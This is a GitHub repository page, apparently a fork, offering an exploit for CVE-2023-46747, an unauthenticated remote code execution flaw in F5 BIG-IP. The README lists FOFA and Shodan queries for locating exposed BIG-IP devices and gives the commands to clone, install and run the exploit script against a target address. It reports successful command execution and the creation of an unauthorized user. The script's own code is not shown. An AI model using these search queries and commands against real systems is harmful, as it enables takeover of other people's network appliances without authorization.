Skip to content

nicdelhi/CVE-2023-46747-RCE

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
CVE-2023-46747-RCE.py
CVE-2023-46747-RCE.py
 
 
README.md
README.md
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

Vulnerability details

  1. fofa:title="BIG-IP®- Redirect"; shodan: title:"BIG-IP®- Redirect"
  2. Affected versions: https://my.f5.com/manage/s/article/K000137353

Vulnerability recurrence

  1. At this time, the user here is only admin: image

  2. Execute the script:

git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190

Successfully executed command: image

  1. A new user was successfully created without authorization here: image

Reference

projectdiscovery/nuclei-templates#8500
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747

About

exploit for cve-2023-46747

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%